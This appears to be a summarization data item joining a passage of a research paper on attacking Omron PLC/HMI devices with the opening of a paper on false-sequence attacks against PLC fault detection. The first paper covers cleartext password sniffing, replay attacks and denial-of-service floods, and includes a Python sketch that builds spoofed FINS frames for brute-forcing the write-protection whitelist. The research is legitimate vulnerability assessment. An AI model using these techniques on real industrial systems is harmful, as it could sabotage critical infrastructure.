4.1 Attacks on the PLC In the following sections, we show how to bypass the password-based read protection and the filtering-based write protection. 4.1.1 Cryptographic attacks: One of the weakest aspects of the FINS protocol is that it does not use any encryption in data exchange. Therefore, using Wireshark [14], we were able to extract the read protection password while it was being sent to the PLC. Figure 4 highlights the captured read protection password, 43214321, while being transferred to the PLC. Figure 4. The captured read protection password. Moreover, since no encryption is used, we were able to capture even more valuable information, such as the FTP access password that allows accessing the memory card on the PLC, the HTTP access password that provides almost full control over the PLC through a web server, and the node numbers of the legitimate nodes that are allowed to access and control the PLC (the importance of these node numbers will be highlighted in the following section). As a result, the absence of encryption in the FINS protocol and the use of a simple eavesdropper like Wireshark offered vital information that can be exploited in sabotaging the PLC. 4.1.2 Replay attacks: The other security feature of the FINS protocol is the write protection. As mentioned earlier, the write protection helps filter out write requests coming from unauthorized nodes. This works by selecting and inserting exceptions into the PLC representing the node numbers of the other PLCs (or SCADA components) that the PLC can communicate with. Nevertheless, by eavesdropping on the SCADA traffic, we were able to detect the node numbers that each PLC communicates with. This was done by simply checking which node numbers each PLC was replying to. Another method for detecting these node numbers is to simply try every possible node number.
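To make the replay and brute-force ideas concrete, the following Python sketch builds a FINS/UDP command frame with a spoofed source address and enumerates the candidate source network/node pairs. The DNA/DA1/DA2 and SNA/SA1/SA2 field layout follows the FINS command data structure shown in Figure 5; the ICF/GCT constants and the default command code are assumptions from common FINS/UDP usage, not values taken from this paper.

```python
def fins_frame(dst_net, dst_node, src_net, src_node,
               command=b"\x01\x01", body=b""):
    """Build a minimal FINS/UDP command frame. There is no encryption
    or authentication: the spoofed SNA/SA1 bytes are all the write
    protection ever checks."""
    header = bytes([
        0x80,      # ICF: command frame, response required (assumed)
        0x00,      # RSV: reserved
        0x02,      # GCT: permissible gateway count (assumed default)
        dst_net,   # DNA: destination network number
        dst_node,  # DA1: destination node number
        0x00,      # DA2: destination unit (CPU)
        src_net,   # SNA: source network number (spoofed)
        src_node,  # SA1: source node number (spoofed)
        0x00,      # SA2: source unit
        0x00,      # SID: service ID
    ])
    return header + command + body

def candidate_sources():
    """All 127 network numbers x 255 node numbers = 32,385 pairs to
    try when brute-forcing the write-protection whitelist."""
    return [(net, node) for net in range(1, 128) for node in range(1, 256)]
```

Sending one such frame per candidate pair and observing which sources the PLC answers reproduces the whitelist-discovery step described here; only the frames whose spoofed source matches an exception entry get past the write protection.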
The FINS protocol allows the assignment of one of 255 node numbers for each PLC on 127 network numbers. Therefore, overall, we get 255 × 127 = 32,385 possibilities. We can easily send write requests using all possible node numbers and then detect which requests the PLC replies to. Finally, after detecting the legitimate node numbers that a PLC can communicate with, we were capable of bypassing the write protection and executing any write request on the PLC by setting the source network and node numbers to one of these legitimate values. As a result, we were able to send orders to open/close the PLC's output modules, turn the PLC on and off, change its IP address, change the exceptions for the legitimate node numbers or remove them altogether, and entirely reprogram the PLC. Figure 5 illustrates the different fields in the FINS protocol that can be manipulated in order to inject specific commands. The DNA/DA1/DA2 and SNA/SA1/SA2 fields represent the destination and source network, node, and unit numbers, respectively, and the Command code field is used to identify the command to be executed. Figure 5. FINS protocol command data structure [15]. 4.1.3 Fragmentation attacks: Fragmentation attacks are performed by sending specially crafted packets that can cause the PLC to crash or at least stop responding. We performed five fragmentation attacks: 1- Ping of Death attack: this attack was performed by sending IP packets with a size larger than the maximum allowed IPv4 packet size.
2- TearDrop attack: this attack was performed by sending IP fragments such that one fragment fits entirely inside another one. 3- Zero-Length fragmentation attack: this attack was performed by sending IP packets with length equal to zero. 4- Nestea attack: this is the Linux equivalent of the TearDrop attack. 5- Oshare attack: this attack was performed by sending multiple malformed IP packets. The PLC proved immune to these attacks: all the packets were discarded by the PLC and did not affect its performance. 4.1.4 DoS attacks: Similarly to the fragmentation attacks, DoS attacks aim at crashing the PLC by sending a very large number of packets within a very small time frame. We successfully performed DoS attacks using four methods: a- UDP reflect attack. Another weakness in the PLC protocol is that the PLC responds to every single read request arriving from any IP/MAC-address/node-number, with no filter in place. Therefore, by simultaneously sending a very large number of read requests (i.e., memory area read, controller cycle read, and controller status read requests), the PLC stopped responding as long as the flooding was active. In order to perform this attack, it was enough to send one packet every 3 milliseconds (333 packets per second), where each packet was only 58 bytes long. Consequently, we were using a bandwidth of only 151 kbps, and it was enough to stop the PLC from responding. b- Netwox. Netwox [16] is a powerful toolbox that can be used to perform multiple attacks. In our test-bed we used two of the Netwox tools: Netwox tool #76: SYN flood attack, which aims at crashing the DUT by flooding it with SYN packets; and Netwox tool #74: random IP packet flooding, which aims at crashing the DUT by flooding it with random IP packets. Both attacks were successful, and as long as the flooding was active, the connection with the PLC was dead.
However, both of these attacks involve a very large number of packets and the use of a large bandwidth, hence they can be easily detected. c- WWW infinite request attack. This attack is performed by flooding the PLC's HTTP port with HTTP requests. A simple shell script was used to perform the attack. As a result, the PLC was inaccessible through its HTTP port as long as the flooding was active. This attack also uses a very large number of packets and hence can be easily detected. d- LOIC. LOIC [17] is a tool used to perform a DoS attack by sending UDP/TCP/HTTP packets at very high rates. While this attack was successful and the PLC stopped responding, detecting it is relatively easy because of its very high bandwidth consumption. 4.2 Attacks on the HMI In this section, we show how to bypass the Screen Data Security Function and the User Security Function. 4.2.1 Cryptographic attacks: The User Security Function uses a five-level password security module. These passwords are used to define the authentication level of the users and to grant them access according to their assigned privileges. Hence, securing these passwords is very important, especially those that grant high permission levels. However, these passwords can be easily captured using Wireshark, since they are sent in the clear while programming the HMI. 4.2.2 Replay attacks: The Screen Data Security Function requires the user to insert a password into the HMI programming software on the controller PC in order to gain permission to program the HMI. This function performs the authentication through this software only (the HMI is not involved in the authentication), thus we were not able to capture the password. However, because the HMI was not involved in the authentication, we were able to perform replay attacks easily.
Consequently, we were able to restart the HMI, reverse the open/close buttons, change the User Security Function passwords, and reprogram the HMI altogether. This attack can have devastating consequences on an industrial scale. 4.2.3 Fragmentation attacks: The same five attacks that were performed on the PLC were performed on the HMI. While all five attacks were unsuccessful against the PLC, only four of them were unsuccessful against the HMI: the Zero-Length fragmentation attack froze the HMI as long as the flooding was active. As with all flooding attacks, detecting this attack is relatively easy. 4.2.4 DoS attacks: It was also relatively easy to perform DoS attacks on the HMI, using four techniques: a- Restart functions. From Section 4.2.2, we saw that we can restart the HMI using a simple replay attack. This attack is performed by sending one 80-byte packet that forces the HMI to restart, which takes 20 seconds. Therefore, by sending one packet every 20 seconds, the HMI is forced to restart continuously. Moreover, by changing the source IP and MAC address of this packet each time, detecting this attack becomes nearly impossible. b- Netwox. In this attack we used the same two tools used in attacking the PLC. Both attacks stopped the connection with the HMI and froze the HMI touch screen. Again, we must mention that this attack can be easily detected. c- WWW infinite request attack. This attack is performed on the HTTP port of the HMI by flooding it with HTTP requests.
As a result, the HTTP connection with the HMI was dead as long as the flooding was active. As with the PLC, this attack is easily detected because it uses a very large number of packets. d- LOIC. As expected, LOIC attacks stopped the connection with the HMI and froze its touch screen as long as the flooding was active. However, the HMI was only vulnerable to UDP and HTTP LOIC attacks, whereas TCP flooding had no effect on it. As mentioned earlier, LOIC uses very large transmission rates, which makes it very easy to detect. V. RESULTS AND ANALYSIS Based on the above attacks, we can conclude that the Omron PLC CJ1M-CPU11-ETN is very easy to bring down, starting with the fact that all data is sent in the clear, which means that capturing valuable information is straightforward. As a result, the Omron FINS protocol makes it very easy to bypass all the security measures by masquerading as a legitimate node number and performing any type of replay attack, which is hard to detect in some cases. Therefore, we were able to start/stop the PLC, change its permissions, change its IP, change the passwords (even without knowing the old passwords), change the write protection features, and even reprogram the PLC altogether. In addition, the PLC is vulnerable to DoS attacks; although these attacks were successful, we must mention that they were only able to stop the communication with the PLC. The PLC itself did not stop running, and its modules kept running smoothly. Finally, this PLC is immune to fragmentation attacks. On the other hand, the Omron HMI NS5-SQ11-v2 has two security features that were very easy to bypass: the Screen Data Security Function was bypassed via a basic replay attack, and the User Security Function, which enables critical functions through the HMI's touch screen using a five-level password security system, transmits the passwords in the clear. Therefore, it was very easy to collect these passwords.
In addition, we were able to restart the HMI using specially fabricated packets, change the passwords and functions, and again reprogram the HMI. The HMI is vulnerable to DoS attacks and to some fragmentation attacks. Table 1 summarizes the attack results. The previous vulnerabilities in the Omron components can have devastating consequences, and the main reason behind these vulnerabilities is the lack of encryption. Finally, replacing the hub in the test-bed with a switch or a Wi-Fi access point might increase the test-bed's security. When using a switch, cryptographic attacks would become very hard to perform without ARP cache poisoning, since we would no longer be able to sniff the packets transmitted between the SCADA components and the controller, and hence would not detect the passwords, node numbers, etc. However, replay attacks, fragmentation attacks, and DoS attacks would all still be applicable. On the other hand, when using a Wi-Fi access point, sniffing valuable information would become very easy, and all of the previous attacks would still be applicable. However, if a strong wireless security algorithm, such as WPA2, were implemented along with a strong password, the attacker would no longer be able to access the test-bed, and hence the attacks would no longer be applicable. VI. CONCLUSION AND FUTURE WORK In this paper, we showed how vulnerable some SCADA systems are, either by bypassing the protocol security features or by attacking the SCADA components themselves. We performed cryptographic attacks, DoS attacks, replay attacks, and fragmentation attacks. Our results showed that these attacks are very easy to perform and hard to detect. Therefore, finding a solution is an urgent matter to ensure the safety of SCADA networks. As future work, we are planning to perform the previous tests on more SCADA components from multiple manufacturers in order to obtain a more comprehensive view of SCADA security.
TABLE 1: ATTACK RESULTS

Attack                     | On the PLC   | Severity  | On the HMI | Severity
Cryptographic attacks      | Successful   | Very high | Successful | Very high
Replay attacks             | Successful   | Very high | Successful | Very high
Fragmentation attacks      | Unsuccessful | Safe      | Successful | Medium
Denial of Service attacks  | Successful   | High      | Successful | High

Acknowledgment: The authors would like to acknowledge the Lebanese National Council for Scientific Research for its support of this research work.
Summary:
Supervisory Control and Data Acquisition (SCADA) systems have become essential to many industries around the world. Nowadays, SCADA systems control many critical infrastructures such as power grids, mega factories, water treatment systems, and even nuclear power plants. As a result, SCADA systems have become very attractive targets for malicious attacks. In this paper, we show a test-bed that we have developed to detect vulnerabilities within SCADA protocols against internal attacks, in order to find out how easy it is to bypass security measures in such protocols. Furthermore, we have tested SCADA components to assess their vulnerabilities against the following attacks: Denial of Service (DoS) attacks, replay attacks, cryptographic attacks, and fragmentation attacks. Our results indicate that SCADA protocols and components are very vulnerable, and hence it is of paramount importance to find immediate solutions to these vulnerabilities.
Summarize:
1 Introduction Control systems, as the fundamental components of cyber-physical critical infrastructures, have been widely used in power grids. On account of their crucial role in modern industrial society, they are becoming highly vulnerable targets for adversaries causing malicious damage. Traditional safety protection relies mostly on cyber security solutions and is efficient at preventing virus invasion into the industrial network. However, recent research has demonstrated that no controller code posing an existential threat is allowed to execute after it has passed physical safety checks with the Trusted Safety Verifier (TSV) [1]. Moreover, intruding into the host system, as the Stuxnet malware did [2, 3], is a very challenging job in view of well-protected control networks. Therefore, more and more interest has been paid to traditional false data injection (FDI) attacks, which do not require breaking through the hardened industrial control network to upload a malicious payload into the power control system. In recent years, more and more security research has focused on FDI attacks in power grids. From the view of the system's topology, Liu et al. [4] announced that false data injection attacks could introduce arbitrary errors into certain state variables and mislead the state estimation process without being detected by bad measurement detection. Yang et al. [5] implemented the FDI attack on various IEEE standard bus systems, and proved its advantage over a baseline strategy of random selections. However, the above FDI attacks are feasible only under the assumption that the whole system's configuration or topology is available and a great number of compromised sensors of a large power system are accessible, which is hard to achieve during actual operation. From the view of cyber-physical platforms, Mclaughlin et al. [6] proposed an FDI attack against PLCs that uses the controller's behavioral model to search for the optimal input vector to destroy the control system. Pang et al.
[7] presented stealthy false data attacks, which can thoroughly destroy the normal operation of output track control systems. Both of them ignore mature solutions for fault detection [8-10], which are applied in intelligent controllers such as PLCs. In this paper, we present a false sequence attack against PLCs, which can disable the fault detection in PLCs. Only a few compromised sensors and a sufficient signal sequence (I/O vectors) monitored between the PLC and the actual plant are required to be controlled during the construction of the attack. Moreover, we analyze and model the collected fault-free I/O traces of compromised PLCs to find false sequences, which can be injected into the inputs of remote sensors to damage the control system and cannot be detected by fault detection. It is noteworthy that, under the condition of existing fault detection, we take advantage of the fault-tolerance rate k to construct false sequences based on the identified model. We organize the rest of this paper as follows: in Section 2, we give the formulation of our false sequence attack. In Section 3, we present the modeling of the PLC-based control system and the construction of the false sequence attack. In Section 4, we provide a representative industrial simulation and obtain some simulation results. In Section 5, we draw some conclusions. 2 Problem Formulation Considering the threat model described in Fig. 1, attackers only need to access and confuse the remote, less-protected sensors of the control system that are distributed geographically across the country. Then, the attack can indirectly perform malicious damage to the human-machine interface (HMI), whose inputs come from remote sensors of remote terminal units (RTUs) or PLCs through the heterogeneous communication networks. To prevent anomalies caused by physical faults, every smart controller deploys a fault detection mechanism.
*This work is supported by the National Natural Science Foundation of China (Grant Nos. 61172064, 61473184).
To ensure the feasibility of our attack, we assume that the attackers get hold of the high-level infrastructural configuration, such as the connecting relationship between the sensors/actuators and the RTU or PLC inputs/outputs, which is not hard to access in practice. With the above knowledge, the attackers construct the false sequence attack to inject into compromised sensors, which send misguided measurements to the PLC.
Proceedings of the 35th Chinese Control Conference, July 27-29, 2016, Chengdu, China.
Figure 1: The threat model for false sequence attack. However, the challenge is how to construct the attack so that it makes PLCs perform malicious actions despite the mature fault detection deployed in the control system. One of the main tasks for the false sequence attack is to analyze and disable the fault detection. The false sequence attack essentially exploits the vulnerability that the fault detection principle was designed merely to solve the random fault problem, and sends undetectable, corrupted measurements to the PLC through compromised remote sensors. Fig. 2 shows how the attack is constructed. We assume the adversaries have access to the signal or stack traces exchanged between the PLC controller and the plant. With the input and output vector databases, we identify a fault-free discrete event model, similar to the modeling approach of fault detection. Finally, we search the identified model for all the sets of undetectable false sequences that cause malicious system behavior. The specific search algorithm is discussed in the next section. Note that obtaining an appropriate length of false sequences is crucial in the whole traversal process.
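The search step above can be illustrated with a toy breadth-first search over an identified fault-free model. This is a simplified sketch under stated assumptions: the transition map, the symbols, and the "unsafe" set are hypothetical, and the paper's actual algorithm operates on the identified NDAAO together with the fault-tolerance rate k, which this version omits. The key idea it shows: a false sequence stays inside the model's language (hence passes fault detection) yet terminates in a symbol the attacker considers damaging.

```python
from collections import deque

def find_false_sequences(transitions, start, unsafe, max_len):
    """Enumerate I/O-symbol sequences that remain within the identified
    model's language but end in an unsafe symbol.

    transitions: dict mapping each I/O symbol to the set of symbols the
                 fault-free model allows to follow it.
    start:       symbol the attack begins from.
    unsafe:      attacker-chosen set of damaging symbols (hypothetical).
    max_len:     bound on the traversal depth, since sequence length
                 matters for the search.
    """
    found, queue = [], deque([(start,)])
    while queue:
        seq = queue.popleft()
        if seq[-1] in unsafe:
            found.append(seq)      # undetectable and damaging
            continue
        if len(seq) < max_len:
            for nxt in transitions.get(seq[-1], ()):
                queue.append(seq + (nxt,))
    return found
```

For a tiny model where A may be followed by B, and B by C or D, marking D unsafe yields the single candidate sequence (A, B, D).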
Figure 2: Construction of the false sequence attack. 3 Modeling and construction of the false sequence attack We require a formal description to identify m-behaviors, BEH^m_Ident, and to observe m-behaviors, BEH^m_Obs, which is introduced to quantify the exceeding m-behaviors generated by the identified model. The identification goal is to minimize the amount of exceeding m-behaviors for a given value of the identification parameter m; that is, BEH^m_Ident should be equal to BEH^m_Obs. Then we construct the false sequences on the basis of the identified model. 3.1 Data collection and formal definition of observed behavior We can collect sampled data between the PLC and the controller by capturing the signals after they have been gathered by the PLC controller [8]. Fig. 3 shows the widely adopted method to capture I/O vector sequences from the PLC, which can be used to monitor the compromised data by the attacker. We collect the data to form the identification database at the end of each I/O vector calculus through the OPC communication mode. Figure 3: PLC cycle and data collection. After implementing the collection of data, we need to define the observed input/output (I/O) sequences, language, and behaviors of the collected data. Before we start, we introduce the following definition. Definition 1: The set of the observed I/O sequences of the collected data with r inputs and s outputs is denoted as

    Σ = (σ_1, ..., σ_p)    (1)

where σ_i = (u_i(1), u_i(2), ..., u_i(|σ_i|)), u_i(j) is the j-th I/O vector of the i-th sequence, and u = (I_1, ..., I_r, O_1, ..., O_s) = (IO_1, ..., IO_m) with m = r + s. We assume that u(t) ≠ u(t+1) holds for two successive I/O vectors, to make sure that an I/O vector is considered a new one if and only if at least one of its components has changed. Definition 2: The observed language set and behavior of the collected data: the observed language of length q is the set of observed I/O vector sequences of length q.
    L^q_Obs = ⋃_i ⋃_{t=1}^{|σ_i|−q+1} { (u_i(t), u_i(t+1), ..., u_i(t+q−1)) }

With the observed language set, the observed behaviors of length n are defined as:

    BEH^n_Obs = ⋃_{i=1}^{n} L^i_Obs    (2)

3.2 Model identification 3.2.1 Model class The aim of identification is to make sure that the identified m-behaviors BEH^m_Ident are equal to the observed m-behaviors BEH^m_Obs, where m can be any available value. Briefly, the identified model will reproduce the language of the PLC-based control system. The considered system is the coupled system of a well-programmed controller and a physical plant, which is regarded as non-deterministic. Hence, we present the Non-Deterministic Autonomous Automaton with Output (NDAAO) [10], which is suited to model our system. Definition 3: A non-deterministic autonomous automaton with output (NDAAO) is a five-tuple NDAAO = (X, Ω, f_nd, λ, x_0) with: X = {x_0, ..., x_{|X|−1}}, the finite set of states; Ω = {ω_1, ..., ω_{|Ω|}}, the finite set of output symbols; f_nd: X → 2^X, the non-deterministic transition function; λ: X → Ω, the output function associating each state with an output symbol; and x_0, the initial state. The NDAAO can be represented by a digraph G = (V, E). The vertex set of G is the set of all states in the NDAAO: V(G) = X. The edge set of G is given by the transition function f_nd: E(G) = {(x_i, x_j) ∈ X × X : x_j ∈ f_nd(x_i)}. With each node associated with the output λ(x_i) of the corresponding state x_i, Fig. 4 shows a simple example of the graphical representation of an NDAAO.
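The digraph view of Definition 3 is mechanical to compute, and walking the transition function also enumerates the words the automaton can generate (formalized as the word sets W^n in Definition 4 below). A minimal sketch with a hypothetical two-state NDAAO; the dict names are illustrative, not from the paper:

```python
def ndaao_edges(X, f_nd):
    """E(G) of the digraph representation (Definition 3): an edge
    (x_i, x_j) exists iff x_j is in f_nd(x_i)."""
    return {(xi, xj) for xi in X for xj in f_nd.get(xi, ())}

def words(X, f_nd, lam, n):
    """Length-n output words obtained by following f_nd from every
    state and reading off the output function lam at each state."""
    paths = [[x] for x in X]
    for _ in range(n - 1):
        paths = [p + [nxt] for p in paths for nxt in f_nd.get(p[-1], ())]
    return {tuple(lam[x] for x in p) for p in paths}
```

For X = {x0, x1} with f_nd(x0) = {x1}, f_nd(x1) = {x0} and outputs λ(x0) = A, λ(x1) = B, the length-2 words are (A, B) and (B, A), matching the union-over-states construction.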
Figure 4: Graphical representation of an NDAAO

Definition 4: Word set and behavior of the NDAAO: the set of $n$-length words generated by the NDAAO starting in $x_i$ is

$W^n_{x_i} = \{\, w \in \Omega^n \mid w = (\lambda(x(1)), \dots, \lambda(x(n))) : \exists (x(1), \dots, x(n)) : x(1) = x_i \in X \text{ and } \forall\, 1 \le t \le n-1,\; x(t+1) \in f_{nd}(x(t)) \,\}$  (3)

Then the set of words of length $n$ generated by the NDAAO is

$W^n(NDAAO) = \bigcup_{x_i \in X} W^n_{x_i}$  (4)

With the word set, we can obtain the identified $n$-behavior of the NDAAO:

$BEH^n_{Ident} = \bigcup_{p=1}^{n} W^p(NDAAO)$  (5)

Definition 5: An identified event vector $\delta(j)$ is the variation between two adjacent identified output vectors $\omega(j)$ and $\omega(j+1)$ of the NDAAO; it is formulated as $\delta = \omega(j+1) - \omega(j)$. An input event vector $\delta_I(j)$ is defined from the input parts $I(j)$ and $I(j+1)$ of two adjacent identified output vectors, and an output event vector $\delta_O(j)$ is defined analogously. The specific formulation is:

$\delta(j) = \bigcup_{l=1}^{m} \begin{cases} I_l 1 \text{ or } O_l 1, & \text{if } IO_l(j+1) - IO_l(j) = 1 \\ I_l 0 \text{ or } O_l 0, & \text{if } IO_l(j+1) - IO_l(j) = -1 \\ \epsilon, & \text{if } IO_l(j+1) - IO_l(j) = 0 \end{cases}$  (6)

Considering an I/O vector sequence involving two inputs and one output, we have $\Sigma = (A, B, C) = ((0,1,0), (1,1,0), (1,0,1))$. This sequence can be represented as:

$A \xrightarrow{I_1 1} B \xrightarrow{I_2 0,\; O_1 1} C$

3.2.2 Identification algorithm

We present an identification algorithm generating the NDAAO described in the previous section. We define an identification parameter $k$ that determines the length of the I/O vector sequences used to create new states. The parameter $k$ serves to produce k-behaviors of the NDAAO that are exactly equal to the k-behaviors generated from the observed vectors; the produced NDAAO is called k-complete. The construction of the NDAAO is divided into three steps. Firstly, we transform the observed sequences into sequences of words of length $k$, creating $k-1$ dummy entries at the beginning to be consistent with the other words; Part 1 of Algorithm 1 shows this transformation. Secondly, we perform the NDAAO identification.
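The event-vector construction of Definition 5 (Eq. 6) can be sketched as follows; this is a minimal illustration with a hypothetical helper name, where an entry `X1` denotes a rising edge and `X0` a falling edge, and unchanged entries ($\epsilon$) are omitted:

```python
def event_vector(u_prev, u_next, labels):
    """Event vector between two adjacent binary I/O vectors (Eq. 6)."""
    events = []
    for prev, nxt, name in zip(u_prev, u_next, labels):
        if nxt - prev == 1:
            events.append(name + "1")   # rising edge
        elif nxt - prev == -1:
            events.append(name + "0")   # falling edge
    return events
```

Applied to the example above, the step from A = (0,1,0) to B = (1,1,0) yields the single event I11, and the step from B to C = (1,0,1) yields I20 and O11.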
The states of the NDAAO are associated with words of length $k$, and the transition function is derived from words of length $k+1$; Part 2 of Algorithm 1 shows the identification of the NDAAO. Finally, we merge equivalent states to reduce the state space: for any two different states $x_i$ and $x_j$, if they are associated with the same output and have the same set of successors, they can be merged into one state. We visualize the model by drawing the graph defined by the states and transition function of the NDAAO; the specific procedure is shown in Part 3 of Algorithm 1.

Example 1. Consider three sequences collected from the fault-free system: $\sigma_1 = (A,B,C,D,E,A)$, $\sigma_2 = (A,B,D,C,D,E,A)$, $\sigma_3 = (A,D,B,C,D,F,E,A)$. The capital letters represent different I/O vectors. Here we choose the identification parameter $k = 2$. After the transformation of the sequences, we obtain

$\sigma^{k=2}_1 = (AA, AB, BC, CD, DE, EA)$
$\sigma^{k=2}_2 = (AA, AB, BD, DC, CD, DE, EA)$
$\sigma^{k=2}_3 = (AA, AD, DB, BC, CD, DF, FE, EA)$

and

$\sigma^{k=3}_1 = (AAA, AAB, ABC, BCD, CDE, DEA)$
$\sigma^{k=3}_2 = (AAA, AAB, ABD, BDC, DCD, CDE, DEA)$
$\sigma^{k=3}_3 = (AAA, AAD, ADB, DBC, BCD, CDF, DFE, FEA)$

After obtaining $\Sigma^{k=2}$ and $\Sigma^{k=3}$, we obtain the states from $\Sigma^{k=2}$ and the transition function from $\Sigma^{k=3}$ according to Part 2 of Algorithm 1. The corresponding graph is shown in Fig. 5.
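The transformation step of Example 1 (Part 1 of Algorithm 1) can be sketched as follows, assuming each I/O vector is encoded as a single character; the function name is ours:

```python
def to_k_words(seq, k):
    """Part 1 of Algorithm 1 (sketch): pad with k-1 copies of the first
    symbol, then slide a window of length k to build the word sequence."""
    padded = [seq[0]] * (k - 1) + list(seq)
    return ["".join(padded[m:m + k]) for m in range(len(seq))]
```

For $\sigma_1 = (A,B,C,D,E,A)$ this reproduces the word sequences of Example 1 for both $k = 2$ and $k = 3$.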
Algorithm 1 Construction of the NDAAO
Input: observed I/O sequences $\Sigma$ and identification parameter $k$
Output: the NDAAO and digraph $G = (V, E)$

// Part 1: transformation of the observed sequences
for each $\sigma_i \in \Sigma$ do
  if $u_i(1) \neq u_i(|\sigma_i|)$ then
    remove $\sigma_i$ from $\Sigma$
  else
    $\tilde{\sigma}_i(t) = u_i(1)$ for $1 \le t \le k-1$, and $\tilde{\sigma}_i(t) = u_i(t-k+1)$ for $k \le t \le k + |\sigma_i| - 1$
    for $m = 1$ to $|\sigma_i|$ do
      $w_i(m) = (\tilde{\sigma}_i(m), \dots, \tilde{\sigma}_i(m+k-1))$
    end for
    $\sigma^k_i = (w_i(1), \dots, w_i(|\sigma_i|))$
  end if
end for
$\Sigma^k = \bigcup_{i=1}^{|\Sigma|} \sigma^k_i$

// Part 2: identification of the NDAAO
initialize the states $X = \emptyset$, the transition function $f_{nd}$, the output function $\lambda$, the initial state $x_0 = \Sigma^k[0][0]$, the nodes $V = \emptyset$ and the edges $E = \emptyset$
for each word $w \in \Sigma^k$ do
  create a state $x_w$, add it to $X$ and set $\lambda(x_w) = w(|w|)$
end for
for each word $v \in \Sigma^{k+1}$ do
  let $x$ be the state of the prefix $v(1 \dots k)$
  add the state of the suffix $v(2 \dots k+1)$ to $f_{nd}(x)$
end for

// Part 3: reduction of the state space and graphical representation
for all $x_i, x_j \in X$ with $i \neq j$ do
  if $\lambda(x_i) = \lambda(x_j)$ and $f_{nd}(x_i) = f_{nd}(x_j)$ then
    merge $x_i$ and $x_j$: delete one of them from $X$ and redirect the transitions of its predecessors to the remaining state
  end if
end for
$V = X$; $E = \{(x, x') : x' \in f_{nd}(x)\}$; draw $G(V, E)$

Figure 5: Identified NDAAO after the second step of the identification algorithm

The primarily identified model has redundant states and edges compared with the original model; hence we reduce the state space according to Part 3 of Algorithm 1 to simplify the primary model. For example, if we merge the state DB with the state AB, the state BA with the state EA, and the state BC with the state DC, and replace each k-length word with $x_i$ for $x_i \in X$, we obtain the simplified NDAAO in Fig. 6.

Figure 6: Finally identified NDAAO after merging equivalent states

3.3 Construction of the False Sequence Attack

After we identify the fault-free NDAAO, we can exploit the principle of fault detection to construct undetectable false sequences.
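Before turning to the attack, the state-building and transition steps of Algorithm 1 (Part 2) can be sketched as follows; this is an illustrative reading of the algorithm under our own naming, taking the already transformed k-word and (k+1)-word sequences as input:

```python
from collections import defaultdict

def identify_ndaao(k_seqs, k1_seqs):
    """Part 2 of Algorithm 1 (sketch): states are k-length words, the
    output of a state is the last symbol of its word, and each
    (k+1)-length word w yields a transition from w[:-1] to w[1:]."""
    states = {w for seq in k_seqs for w in seq}
    out = {w: w[-1] for w in states}          # lambda(x_w) = last symbol
    fnd = defaultdict(set)                    # non-deterministic transitions
    for seq in k1_seqs:
        for w in seq:
            fnd[w[:-1]].add(w[1:])
    return states, out, fnd
```

On the word sequences of Example 1, the state AB has output B and the successor set {BC, BD}, matching the branching visible in Fig. 5.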
As is well known, fault detection determines whether every currently observed I/O vector accords with the output of the identified NDAAO. If so, the current vector is considered legal; otherwise, a fault alert is raised. In our approach, we construct false sequences that not only produce the same outputs as the identified model, ensuring that the attack cannot be detected, but also cause malicious system behavior by choosing an appropriate length of false sequences with false actuating logic. The formal description of a false sequence of length $n$ starting with $x_i$ is defined as follows:

$S^n_{x_i} = \{\, s \in \Omega^n \mid s = (\lambda(x(1)), \dots, \lambda(x(n))) \wedge (s \notin L^n_{Obs}) : \exists (x(1), \dots, x(n)) : x(1) = x_i \in X \text{ and } \forall\, 1 \le t \le n-1,\; x(t+1) \in f_{nd}(x(t)) \,\}$  (7)

The definition of $S^n_{x_i}$ above constructs sequences of length $n$ that are generated by the identified NDAAO yet differ from any sequence of observed I/O vectors. Therefore, the defined false sequence attack is a potentially harmful intrusion when injected into compromised sensors. Since the reduced NDAAO is $(k+1)$-complete, the following equation holds:

$\forall m \le k+1,\; BEH^m_{Obs} = BEH^m_{Ident}$  (8)

According to the above, only the sequences in $S^n_{x_i}$ whose lengths are not less than $k+2$ can be false sequences. The set of all false sequences generated from the NDAAO for identification parameter $k$ is

$A_k = \bigcup_{x_i \in X} \Big( \bigcup_{n=k+2}^{\max(|\sigma_d|)} S^n_{x_i} \Big), \quad \sigma_d \in \Sigma$  (9)

Having defined the false sequences, the next step is to present a search algorithm that obtains all sets of undetectable false sequences. Algorithm 2 shows that the recursive procedure IncSearching gradually obtains the false sequences whose length is not less than $k+2$, i.e., sequences generated from the NDAAO that differ from
any subsequence of the observed I/O vectors, starting from state $x_{init}$. With the output of IncSearching, we acquire the full set of sequences $A_k$ by merging all $S_{x_{init}}$ over all start states $x_{init}$ from the states $X$ of the NDAAO:

$A_k = \bigcup_{x_{init} \in X} S_{x_{init}}$  (10)

Algorithm 2 IncSearching
Input: the identified NDAAO, observed I/O sequences $\Sigma$, identification parameter $k$ and initial state $x_{init}$
Output: the set of false sequences $S_{x_{init}}$

for each $x \in f_{nd}(x_{init})$ do
  seq.append($x$)
  IncSearching(NDAAO, $\Sigma$, $k$, $x$)
  if $|seq| \ge k+2$ and seq is not a substring of any $\sigma \in \Sigma$ then
    $S_{x_{init}}$.append(seq)
  end if
  seq.pop()
end for
return $S_{x_{init}}$

By Algorithm 2, the obtained sets of undetectable false sequences of Example 1 are $(A,D,B,D,\dots)$, $(\dots,D,C,D,F,\dots)$ and $(A,B,C,D,F,\dots)$, where the ellipses before or after a letter can be any predecessors or successors of that letter. Because attackers might have control over only a limited number of compromised sensors in the control system, we need to determine the controller I/Os that change between two consecutive vectors of the false sequences generated by the above method.

3.4 Feasibility and Performance Evaluation

There are two main reasons supporting the feasibility of our work. Firstly, as the identification parameter $k$ increases, the number of states of the NDAAO grows rapidly and converges more slowly to a stable level as the system evolves chronologically [10]. Hence, it is difficult to handle the large amount of computation required for on-line detection when $k$ is large; we mostly carry out the attack off-line and have enough time to perform the computation. Secondly, due to the stability and performance requirements of the detection mechanism, in an actual industrial system a small parameter $k$ is generally sufficient to meet the practical requirements of fault detection [8].
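The incremental search of Algorithm 2 can be sketched as a recursive enumeration over the identified NDAAO; this is an illustrative sketch under our own naming, with states and outputs encoded as single characters:

```python
def false_sequences(fnd, out, observed, k, x_init, max_len):
    """Sketch in the spirit of Algorithm 2: enumerate paths through the
    identified NDAAO and keep output words of length >= k+2 that never
    occur as a substring of any observed sequence (Eq. 7 / Eq. 9)."""
    obs_text = ["".join(s) for s in observed]
    found, path = [], [x_init]

    def search(state):
        if len(path) > max_len:          # bound the recursion depth
            return
        word = "".join(out[x] for x in path)
        if len(path) >= k + 2 and not any(word in t for t in obs_text):
            found.append(word)
        for nxt in sorted(fnd.get(state, ())):
            path.append(nxt)
            search(nxt)
            path.pop()

    search(x_init)
    return found
```

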